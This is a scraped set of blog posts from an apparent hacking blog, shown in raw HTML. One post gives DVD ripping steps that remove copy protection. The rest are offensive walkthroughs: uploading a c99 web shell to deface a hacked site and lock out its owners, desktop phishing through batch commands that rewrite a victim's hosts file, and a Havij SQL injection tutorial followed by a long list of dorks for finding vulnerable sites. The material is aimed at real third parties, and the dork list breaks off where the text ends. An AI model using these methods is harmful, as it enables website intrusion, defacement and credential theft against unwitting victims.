</div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"> Install all the Softwares (Download them...all are freewares)……….<br />
1) DivX Create Bundle<br />
2) DVD2AVI<br />
3) DVD Decrypter<br />
4) LAME ACM Codec<br />
5) Virtual Dub<br />
<br />
</span></div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><br />
</div><div class="MsoNormal" style="line-height: normal; margin: 5pt 0in;"><span style="font-family: "Times New Roman","serif"; font-size: 12pt;">Step (1): Insert your DVD into the drive and launch DVD decrypter. DVD Decrypter will detect the DVD and its file contents will now be displayed in the right pane. Now go to File > Browse and select the destination for the ripped VOB files. Keep in mind that the destination must have enough free space to store the contents of the entire DVD.<br />
<br />
Step (2): After choosing the destination, click on File>Decrypt to start the decryption process. DVD Decrypter removes the Macrovision Protection by default, and you can set to remove region code as well by going to Tools > IFO > Region > Patch > Region Free. These are necessary for the next step. After the DVD ripping process is completed, close DVD Decrypter.<br />
<br />
Step (3): Next Launch DVD2AVI. Go to File > Open. Make sure the correct track number in the Audio menu is selected. You need to find the correct track number-most DVDs have multiple audio tracks in different languages. This can be checked by selecting one track at a time and playing it. Also click on the Audio menu and navigate to “48>44.1KHz”, and select Off. Go to Help > SIMD Technology and select all the optimizations supported by your processor. Now go to File > Save As AVI.<br />
<br />
Step (4): Decide on a file name and choose a location with enough free space. You will now be prompted to choose a video compressor. Choose “DivX 6.x.x” from the drop-down menu where you can select the video compressor.<br />
<br />
Step (5): Under the Certification Profiles, you can choose an appropriate preset profile such as High Definition, Home Theatre, Portable, Handheld, and Unconstrained. When you choose one of the above profiles, it is virtually guaranteed that the encoded DivX file will be playable on any standalone DivX-certified player. Click on Settings. You can select a bitrate of your choice. A higher bitrate means a larger file size and better quality, while a lower bitrate means a smaller file size and lower image quality.<br />
<br />
Step (6): In the Codec tab, you can set the Encoding mode. The default setting is a good trade-off between quality and compression, but if you wish to control the file size, you can state your own mode such as High Performance, Better Quality, etc. Click on OK and then on save to start the video<br />
demultiplexing process. This will take some time depending on the speed of your computer. At the end of this process, you’ll have an AVI file and a WAV file.<br />
<br />
Step (7): We now get to the creation of the DivX file-putting together the video (AVI) and audio (WAV) files that were created in the previous step. Launch Virtual Dub. Under File > Open, browse to the folder where the AVI and WAV files are stored. Select the AVI file and click Open.<br />
<br />
Step (8): Click on the Audio menu and click “Full Processing Mode”. Click again on the Audio menu and select “WAV Audio”. You will be prompted to open a WAV file. Select the WAV file you created earlier and click Open. Click on the Audio menu and then on Compression. Select “MPEG Layer-3” from the left pane and then select “128 KBit/s, 48,000Hz, Streo” in the right pane. Click OK.<br />
<br />
Step (9): Select Interleaving from the Audio menu. Then, select the “mis” radio button and input “500” into the “Interleave audio every” dialog box. Click OK. Again, in the Audio menu, select Volume. Check the box and move the slider to 200 percent. Click OK.<br />
<br />
Step (10): From the Video menu, select Direct Stream Copy.<br />
<br />
Step (11): Go to File > Save As. Enter a file name of your choice at a location of your choice, and click at a location of your choice, and click OK. This, again, will take some time, but not as much as the video encoding using DVD2AVI. After the process is complete, you’ll have a DivX backup of ypur DVD movie.<br />
Step (12): All that’s left now is to burn the DivX backup up to CD or DVD using your DVD-Writer.<br />
<br />
<br />
</span></div><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><br />
</div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com3tag:blogger.com,1999:blog-289744729559414161.post-26267371898406996502011-06-01T03:10:00.000-07:002011-06-27T20:13:52.748-07:00Shell Uploading<div dir="ltr" style="text-align: left;" trbidi="on"><br /><span class="Apple-style-span" style="color: #cc0000;"><span class="Apple-style-span" style="font-size: large;">What is Shell ?</span></span><br /><br />A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.<br />This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )<br />I am not going to explain SQLi just how to deface.<br />Sql Tut- http://hackingmania.com/Blog/sql-injection-and-defacement-for-beginners-tutorial<br />So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.<br />Now login to the admin page with the admin details you got.<br />Go through the admin page until you find a place where you can upload a picture (Usually a picture).<br />Now you have to upload the shell. Right if you don’t get an error it is all good.<br />Now to find the shell<br />Go through the site until you find any image and if you are using firefox Right<br />- Click on it and “Copy Image Location”<br />Make a new tab and paste it there.<br />It will probably look something like this:<br />http://www.example.com/images/photonamehere.jpg<br />So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)<br />Now a page will come up looking like this:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FRhmxTb09yM15PM_QGVI36usgPkdfB00g1TzKToQaAWo0M7R_f83gQHR-rhGR9T1NUx4NWzzbC4mofmY9cAEJvhJlMoTHrXSAnBjIsUkBus4IKTDMiOeKGBDomy7yd-UB9tf5W5YS0E/s1600/igz03k.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FRhmxTb09yM15PM_QGVI36usgPkdfB00g1TzKToQaAWo0M7R_f83gQHR-rhGR9T1NUx4NWzzbC4mofmY9cAEJvhJlMoTHrXSAnBjIsUkBus4IKTDMiOeKGBDomy7yd-UB9tf5W5YS0E/s320/igz03k.jpg" width="320" /></a></div><br />Does probably not look like that but will look similar.<br />Now you have access to all the files on the site<br />What you want to do is now,<br />Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.<br />Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.<br />Keep in mind:<br />• Change Admin Username and Password<br />•The people have FTP access so you need to change that Password too .<br />•Always use a Proxy or VPN<br /></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-9909590148218259652011-06-01T02:44:00.000-07:002011-06-27T20:13:52.748-07:00Desktop Phishing Hack<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px;"></span><br /><div style="text-align: justify;"><b>It is an advance form of phishing. Kindly read my previous post on normal phishing before proceeding.</b><b>Difference between phishing and desktop phishing is as </b><b>follows.</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>In phishing :-</b></div><a href="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXyZKZY_0I/AAAAAAAAAF4/ndWstZe13Fg/s1600/phishing.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;"><img border="0" height="173" src="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXyZKZY_0I/AAAAAAAAAF4/ndWstZe13Fg/s200/phishing.jpg" width="200" /></a><b></b><br /><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-weight: normal;"><b>1. </b></span><span class="Apple-style-span" style="font-weight: normal;">Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.</span></b></div><br /><div style="text-align: justify;"><b>2</b>.Victim enters his credentials in fake login page that goes to attacker.</div><div style="text-align: justify;"><b>3</b>.Victim is then redirected to an error page or genuine website depending on attacker.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>In desktop phishing:-</b></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXs5qeW3nI/AAAAAAAAAF0/qXylv8Na0LE/s1600/dphising.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;"><img border="0" height="201" src="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXs5qeW3nI/AAAAAAAAAF0/qXylv8Na0LE/s320/dphising.jpg" width="320" /></a></div><div style="text-align: justify;"><b>1</b>. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.</div><div style="text-align: justify;"><b>2</b>. Victim types the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.</div><div style="text-align: justify;"><b>3</b>. Rest of the things are same as in normal phishing.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>What is Hosts File ?</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The hosts file is a text file containing domain names and IP address associated with them.</div><div style="text-align: justify;"><span class="Apple-style-span" style="background-color: #f3f3f3;">Location of hosts file in windows: C:\Windows\System32\drivers\etc\</span></div><div style="text-align: justify;">Whenever we visit any website, say www.anything.com , an query is sent to Domain Name Server(DNS) to look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would</div><div style="text-align: justify;">be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.</div><div class="separator" style="clear: both; text-align: justify;"><a href="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSXRMXS0EuI/AAAAAAAAAFs/pMwyJSH8zNQ/s1600/host.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSXRMXS0EuI/AAAAAAAAAFs/pMwyJSH8zNQ/s320/host.jpg" width="320" /></a></div><div style="text-align: justify;"><b><br /></b></div><div style="text-align: justify;"><b>What is attack ?</b></div><div style="text-align: justify;">I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-size: medium;">Two Steps to perform attack :-</span></b></div><div style="text-align: justify;"><b>1. Create and host phishing page on your computer.</b></div><div style="text-align: justify;"><b>2. Modify victim's host file</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b style="background-color: white;"><span class="Apple-style-span" style="color: #990000;">Step 1 -:</span></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="color: #990000;"><b><br /></b></span></div><div style="text-align: justify;">Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.</div><div style="text-align: justify;"><span class="Apple-style-span" style="background-color: #f3f3f3;"><b>Kindly read my simple tutorial on setting up XAMPP webserver <a href="http://www.explorehacking.com/2011/01/setting-webserver-host-webpages-on-your.html">here</a> and this step would be clear to you.</b></span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b><span class="Apple-style-span" style="color: #990000;">Step 2. </span>This step can performed in two different ways. </b></div><div style="text-align: justify;"><b><br /></b></div><div style="text-align: justify;"><b>Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.</b></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.</div><div class="separator" style="clear: both; text-align: justify;"><a href="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSXRRUOcpQI/AAAAAAAAAFw/3vk_kLZb6II/s1600/host1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/_ufGdCaQ3M3k/TSXRRUOcpQI/AAAAAAAAAFw/3vk_kLZb6II/s320/host1.jpg" width="305" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location <span class="Apple-style-span" style="background-color: #f3f3f3;">C:\Windows\system32\drivers\etc</span> and victim's hosts file get replaced by our modified hosts file.</div><div class="separator" style="clear: both; text-align: justify;"><a href="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ2dv4T-I/AAAAAAAAAFU/WRrBEK1vwaw/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ2dv4T-I/AAAAAAAAAFU/WRrBEK1vwaw/s400/1.jpg" width="217" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ6DkQg3I/AAAAAAAAAFY/wP0x4S-5KXM/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="http://2.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ6DkQg3I/AAAAAAAAAFY/wP0x4S-5KXM/s400/2.jpg" width="400" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ8tlVMUI/AAAAAAAAAFc/N4QjVlkeUSM/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="378" src="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ8tlVMUI/AAAAAAAAAFc/N4QjVlkeUSM/s400/3.jpg" width="400" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ_Tb1EvI/AAAAAAAAAFg/l7kv_Ff-4HA/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXQ_Tb1EvI/AAAAAAAAAFg/l7kv_Ff-4HA/s400/4.jpg" width="301" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXRBlnXT_I/AAAAAAAAAFk/RLiKHQA9KKc/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/_ufGdCaQ3M3k/TSXRBlnXT_I/AAAAAAAAAFk/RLiKHQA9KKc/s400/5.jpg" width="303" /></a></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSXRFkeG5TI/AAAAAAAAAFo/GaLS3CrWyfo/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSXRFkeG5TI/AAAAAAAAAFo/GaLS3CrWyfo/s400/6.jpg" width="301" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div style="text-align: left;">Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Method 2 - Create a batch file which would modify hosts file as per your need.</b></div><div style="text-align: justify;">Open your notepad and type the following text</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span class="Apple-style-span" style="background-color: #f3f3f3;">echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts</span></div><div style="text-align: justify;"><span class="Apple-style-span" style="background-color: #f3f3f3;">echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts </span></div><div style="text-align: justify;"><i style="background-color: white;"><span class="Apple-style-span" style="font-size: xx-small;">Obviously replace it with your IP and website acc. to yourself.</span></i></div><div class="separator" style="clear: both; text-align: justify;"><a href="http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSXQxJfKByI/AAAAAAAAAFQ/BvMjhzYpiwY/s1600/dphish.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="99" src="http://1.bp.blogspot.com/_ufGdCaQ3M3k/TSXQxJfKByI/AAAAAAAAAFQ/BvMjhzYpiwY/s640/dphish.jpg" width="640" /></a></div><div style="text-align: justify;"><i style="background-color: white;"><span class="Apple-style-span" style="font-size: xx-small;"><br /></span></i></div><div style="text-align: justify;"><b>Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat </b></div><div style="text-align: justify;">When victim would run this file, a new entry will be made in hosts file.</div><div style="text-align: justify;"><br /></div><div style="text-align: left;"><div style="text-align: justify;"><i>You can test both the above methods to modify your own hosts file</i></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div style="text-align: left;"><b>Limitations of attack :-</b></div></div><div style="text-align: justify;"><div style="text-align: left;"><b>1</b>.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.</div></div><div style="text-align: justify;"><div style="text-align: left;"><b>2.</b> The browser may warn the victim that Digital Certificate of the website is not genuine.</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Countermeasures:-</b></div><div style="text-align: justify;">Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.</div></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-92190920467835609522011-03-05T20:46:00.000-08:002011-06-27T20:13:52.749-07:00SQL Injection in Easy steps......!!!!!!<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"><span class="smalltext" style="font-size: 11px;"><strong><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">[SQL] HACK SITES USING Havij v1.14</span></span></strong></span></span><br /><div class="post_body" id="pid_2956" style="font-family: Verdana, Arial, sans-serif; font-size: 13px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">it is simple tut how to use havij to hack sites <img alt="Smile" border="0" src="http://hackcommunity.com/images/smilies/smile.gif" style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; border-width: initial; padding-right: 0px; vertical-align: middle;" title="Smile" /><br /><br /></span></span><a href="http://adf.ly/55846/http://lnk.co/GP51J" style="text-decoration: none;" target="_blank"><span class="Apple-style-span" style="color: #3d85c6;"><span class="Apple-style-span" style="background-color: white;">Download Havij v1.14 </span></span></a><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="color: #3d85c6;"><span class="Apple-style-span" style="background-color: white;"><br /></span></span> <br /><br />1.First Find a sqli infected site<br /><br />2-Open havij and copy and paste infected link as shown in figure<br /><br />3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibTyGBO1ct_FlWT_T7BIyWapbNsVhSSZCly_U8yKam8-Ri4BZaWtOLpCWwuxKp2dQ4d3ZW-SG7F-vmKnJT3b2F9IE0GLBndKD4z8KsHuDmIsfWIl9oP0UFufUgRbd61ra2KtVQAjYOmgs/s1600/1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibTyGBO1ct_FlWT_T7BIyWapbNsVhSSZCly_U8yKam8-Ri4BZaWtOLpCWwuxKp2dQ4d3ZW-SG7F-vmKnJT3b2F9IE0GLBndKD4z8KsHuDmIsfWIl9oP0UFufUgRbd61ra2KtVQAjYOmgs/s1600/1.jpeg" /></a><br /><br />4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqAAkc_pPqLrB_yCncUekFb6o1z25mGjFqdoxsjJ4Xh67vuBnst6nv_Kwk0zIcBcsRqT5sZ9x1K2UELzqq5aabUgsGxQAXxp2v97KDqOIJzHrgvIC59068eJ0H03Eaw8lCHEAwvGj0zY4/s1600/2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqAAkc_pPqLrB_yCncUekFb6o1z25mGjFqdoxsjJ4Xh67vuBnst6nv_Kwk0zIcBcsRqT5sZ9x1K2UELzqq5aabUgsGxQAXxp2v97KDqOIJzHrgvIC59068eJ0H03Eaw8lCHEAwvGj0zY4/s1600/2.jpeg" style="cursor: move;" /></a><br /><br />5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ixBaLikugrNDxNDoNBJ7IojZID-uCUVL1FRJuAeUQX9mnXB1ikr-3zZztuWn4Klf8fRp7FEVaTSoKxpibQ8Pepa20TEqNANaKgqsYTrYyoi7gxXf7Hsi2xYYc3WwXOQhQbGuYcf8Xec/s1600/3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-ixBaLikugrNDxNDoNBJ7IojZID-uCUVL1FRJuAeUQX9mnXB1ikr-3zZztuWn4Klf8fRp7FEVaTSoKxpibQ8Pepa20TEqNANaKgqsYTrYyoi7gxXf7Hsi2xYYc3WwXOQhQbGuYcf8Xec/s1600/3.jpeg" style="cursor: move;" /></a><br /><br /><br />6. In that Just put mark username and password and click "Get data"<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgasXQU1yyVblWq3s-lBY7iVsdBSee6eZAWBnWAyfFi2WkZpnhesRHDQoQjr53hrhzuGGgBHZTLVpd1T4dJJxkaJXDx_TwVPBHXsiOrKRyP6kN479gWh4-lr4viOGYrQCLluMTFE-Ng2RM/s1600/4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgasXQU1yyVblWq3s-lBY7iVsdBSee6eZAWBnWAyfFi2WkZpnhesRHDQoQjr53hrhzuGGgBHZTLVpd1T4dJJxkaJXDx_TwVPBHXsiOrKRyP6kN479gWh4-lr4viOGYrQCLluMTFE-Ng2RM/s1600/4.jpeg" style="cursor: move;" /></a><br /><br /><br />8. Bingo Got now id and pass that may be admin...<br />The pass will get as md5 you can crack it also using this tool as shown in figure..<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0pwAt_jrzlp5Chdyrf5xeGOYoVAAQ-nYi-0o3YXA2YY2I-B8PIbwAIqlTGIK_h-qyfGn1rPWqYkt-AOM0WMupBEn98TEw3U5X3RlBenfihd7SNbp5bFTiApRyYHktWSTQRZekE28rcyI/s1600/5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0pwAt_jrzlp5Chdyrf5xeGOYoVAAQ-nYi-0o3YXA2YY2I-B8PIbwAIqlTGIK_h-qyfGn1rPWqYkt-AOM0WMupBEn98TEw3U5X3RlBenfihd7SNbp5bFTiApRyYHktWSTQRZekE28rcyI/s1600/5.jpeg" /></a><br /><br /></span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">*************************************************************************</span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /></span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">HOW TO FInD SQL VU SITES</span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /></span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">GO HERE </span></span><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /></span></span><br /><blockquote style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"><cite style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; display: block; font-style: normal; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">Quote:</span></span></cite><a href="http://adf.ly/55846/http://lnk.co/GP51L" style="text-decoration: none;" target="_blank"><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">http://lnk.co/GP51L</span></span></a></blockquote><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br />THE GREEN COLLOUR MEAN there is SQL Injection Vulnerability<br /><br />like this in the pic</span></span><br /><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /></span></span><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRHjcyiIUZi5cqF28MrysUhqE7YU75S7FWpkeDSOzxJQ9N4GITAtLZS5TUdnJp2lG3bWyWxcZtOSSWH7a4B3Sq-TDRgEf1HdV4ddu2Rvz9-kblqrU2tHLKJGFFZyoxqfh0zccmc9qC4dA/s1600/6.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRHjcyiIUZi5cqF28MrysUhqE7YU75S7FWpkeDSOzxJQ9N4GITAtLZS5TUdnJp2lG3bWyWxcZtOSSWH7a4B3Sq-TDRgEf1HdV4ddu2Rvz9-kblqrU2tHLKJGFFZyoxqfh0zccmc9qC4dA/s1600/6.jpeg" /></a></div><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;"><br /><br />SQL Dorks<br /></span></span><br /><div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #86898b; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">Code:</span></span></div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"><span class="Apple-style-span" style="background-color: white;"><span class="Apple-style-span" style="color: black;">Aqui les dejo unas cuantas Dorks para buscar webs vulnerables:<br /><br />inurl:index.php?id=<br />inurl:trainers.php?id=<br />inurl:buy.php?category=<br />inurl:article.php?ID=<br />inurl:lay_old.php?id=<br />inurl:declaration_more.php?decl_id=<br />inurl:ageid=<br />inurl:games.php?id=<br />inurl:age.php?file=<br />inurl:newsDetail.php?id=<br />inurl:gallery.php?id=<br />inurl:article.php?id=<br />inurl:show.php?id=<br />inurl:staff_id=<br />inurl:newsitem.php?num=<br />inurl:readnews.php?id=<br />inurl:top10.php?cat=<br />inurl:historialeer.php?num=<br />inurl:rtray-Questions-View.php?num=<br />inurl:forum_bds.php?num=<br />inurl:game.php?id=<br />inurl:view_product.php?id=<br />inurl:newsone.php?id=<br />inurl:sw_comment.php?id=<br />inurl:news.php?id=<br />inurl:avd_start.php?avd=<br />inurl:event.php?id=<br />inurlroduct-item.php?id=<br />inurl:sql.php?id=<br />inurl:news_view.php?id=<br />inurl:select_biblio.php?id=<br />inurl:humor.php?id=<br />inurl:aboutbook.php?id=<br />inurl:fiche_spectacle.php?id=<br />inurl:communique_detail.php?id=<br />inurl:sem.php3?id=<br />inurl:kategorie.php4?id=<br />inurl:news.php?id=<br />inurl:index.php?id=<br />inurl:faq2.php?id=<br />inurl:show_an.php?id=<br />inurl:review.php?id=<br />inurl:loadpsb.php?id=<br />inurlinions.php?id=<br />inurl:spr.php?id=<br />inurl:ages.php?id=<br />inurl:announce.php?id=<br />inurl:clanek.php4?id=<br />inurl:articipant.php?id=<br />inurl:download.php?id=<br />inurl:main.php?id=<br />inurl:review.php?id=<br />inurl:chappies.php?id=<br />inurl:read.php?id=<br />inurl:rod_detail.php?id=<br 